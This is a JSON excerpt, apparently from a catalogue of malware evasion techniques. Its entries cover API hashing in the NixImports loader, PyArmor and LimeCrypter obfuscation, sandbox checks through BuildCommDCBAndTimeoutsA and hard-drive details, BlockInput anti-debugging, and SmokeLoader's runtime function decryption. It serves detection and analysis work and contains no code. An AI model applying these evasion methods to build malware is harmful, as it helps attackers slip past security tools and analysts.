"description": "A .NET malware loader employs API-Hashing and dynamic invocation to circumvent static analysis. NixImports utilizes managed API-Hashing to dynamically determine most of its required functions during runtime. For function resolution, HInvoke needs two specific hashes: typeHash and methodHash, representing the type name and the method's full name, respectively. At runtime, HInvoke scans the entire mscorlib to locate the corresponding type and method. Consequently, HInvoke doesn't generate any import references for the methods accessed through it.\r\n\r\nAdditionally, NixImports is designed to minimize the use of well-known methods. Wherever possible, it opts for internal methods over their standard wrappers. This strategy helps in evading the basic hooks and monitoring systems used by certain security tools.",
"resources": "https://github.com/dr4k0nia/NixImports/tree/master\r\nhttps://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/",
"creation_date": "2024-01-14T07:42:17.781000Z",
"tags": "NixImports, packer, .net",
"modification_date": "2024-01-14T07:47:41.089000Z",
"category": [
12
],
"rules": [
148,
149
],
"attachments": [],
"featured_api": [],
"contributors": [
32,
34
]
},
{
"id": 365,
"key": "pyarmor",
"unprotect_id": "U1435",
"name": "PyArmor",
"description": "Pyarmor is a command-line tool primarily used for the obfuscation of Python scripts. While its original design aims to protect Python code from unauthorized access and reverse engineering, its capabilities also make it a tool of interest for malware obfuscation. Pyarmor achieves this through several key features, each with potential applications in both legitimate protection and malicious exploitation:\r\n\r\n- Code Obfuscation: Pyarmor transforms original Python scripts into a form that is significantly more difficult to understand and decompile. This obfuscation process, which alters code structure, names, and other identifiable features while preserving functionality, is a common tactic in malware to conceal harmful operations and evade detection by analysis tools and researchers.\r\n\r\n- Machine Binding: The tool offers the option to bind obfuscated scripts to a specific machine. In legitimate use, this adds security and control over script distribution. In a malware context, this can be misused to target specific victims or to avoid execution in analysis environments, thus evading detection and analysis.\r\n\r\n- Expiration Setting: Pyarmor can set an expiration date for the obfuscated scripts. While beneficial for creating trial software in legitimate scenarios, this feature can be exploited in malware to limit the script's lifespan, making post-infection analysis and reverse engineering more challenging.",
"resources": "http://pyarmor.dashingsoft.com/\r\nhttps://github.com/dashingsoft/pyarmor",
"creation_date": "2024-01-18T01:09:12.754000Z",
"tags": "python, obfuscation",
"modification_date": "2024-01-18T01:09:12.754000Z",
"category": [
12
],
"rules": [
154
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
32
]
},
{
"id": 366,
"key": "limecrypter",
"unprotect_id": "U1436",
"name": "LimeCrypter",
"description": "Limecrypter is a sophisticated obfuscation tool designed for both native and .NET files. It employs a unique approach to secure payloads by encrypting them within a .NET-based stub. This stub acts as a container for the encrypted payload, ensuring its contents remain concealed until execution.",
"resources": "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master\r\nhttps://www.youtube.com/watch?v=TgYb3hwOAV4",
"creation_date": "2024-01-18T01:13:04.663000Z",
"tags": "crypter, limecrypter",
"modification_date": "2024-01-18T01:13:27.449000Z",
"category": [
12
],
"rules": [
155
],
"attachments": [],
"featured_api": [],
"contributors": [
32
]
},
{
"id": 367,
"key": "buildcommdcbandtimeouta",
"unprotect_id": "U1342, T1497.002",
"name": "BuildCommDCBAndTimeoutA",
"description": "This technique uses a `BuildCommDCBAndTimeoutsA` API call to determine if the malware is detonating in a sandbox. Normally, a bogus device string would cause this API call to fail. However, some malware sandbox environments may emulate in a way that allows the API call to succeed even when given a bogus device string.",
"resources": "",
"creation_date": "2024-03-20T00:00:50.060144Z",
"tags": "BuildCommDCBAndTimeoutsA, sandbox evasion",
"modification_date": "2024-03-20T00:10:09.498989Z",
"category": [
1
],
"rules": [
156
],
"attachments": [],
"featured_api": [
626
],
"contributors": [
35
]
},
{
"id": 368,
"key": "retrieve-hdd-information",
"unprotect_id": "U1343",
"name": "Retrieve HDD Information",
"description": "Malware can figure out if it's in a virtual environment by checking hard drive info. It looks for specific details like serial and model numbers. This is easier to spot in VirtualBox because it shows clues that it's running in a virtual space. \r\n\r\nMalware uses this trick to avoid getting caught. It does this by using a special command in the DeviceIoControl Win32 API, called IOCTL SMART_RCV_DRIVE_DATA. But, to use this command, you need top-level access.",
"resources": "https://nicolabottura.github.io/HDDInfo-Evasion-PoC.html",
"creation_date": "2024-03-20T23:27:16.117731Z",
"tags": "malware-detection, virtual-environment-evasion, hard-drive-inspection, virtualbox, deviceiocontrol-api, root-privileges, cybersecurity-tactics, evasion-techniques",
"modification_date": "2024-03-20T23:27:16.117783Z",
"category": [
1
],
"rules": [
157
],
"attachments": [],
"featured_api": [
627
],
"contributors": [
36
]
},
{
"id": 369,
"key": "blockinput",
"unprotect_id": "U1011",
"name": "BlockInput",
"description": "As per Microsoft's documentation, `BlockInput` function \"prevents keyboard and mouse input events from reaching applications,\" effectively restricting user interaction with the system. \r\n\r\nMalware occasionally employs this tactic to hinder analysis by debuggers or other analysis tools throughout the process' runtime. To deactivate the block, the program must make a live call to `BlockInput` with the parameter 0. Windows automatically lifts the block when the process ends or the user initiates `Ctrl+Alt+Del`.",
"resources": "https://malware.news/t/art-of-anti-detection-4-self-defense/32182",
"creation_date": "2024-03-22T06:24:53.208170Z",
"tags": "blockinput, keyboard",
"modification_date": "2024-03-22T06:24:53.208229Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [
628
],
"contributors": [
37
]
},
{
"id": 370,
"key": "runtime-function-decryption",
"unprotect_id": "U0523",
"name": "Runtime Function Decryption",
"description": "This technique is used to store the function body in an encrypted form. They will only be decrypted just before the execution of that code and will be re-encrypted after the code has been executed. \r\n\r\nThis technique is used by SmokeLoader to evade anti-virus and EDRs, since the function body is in encrypted form except at the time of execution of the function. It also makes the static analysis of SmokeLoader harder.",
"resources": "https://irfan-eternal.github.io/understanding-internals-of-smokeloader/#encrypted-function-code",
"creation_date": "2024-03-22T06:30:48.583023Z",
"tags": "encryption, smokeloader",
"modification_date": "2024-03-22T06:30:48.583077Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
38
]
}
]
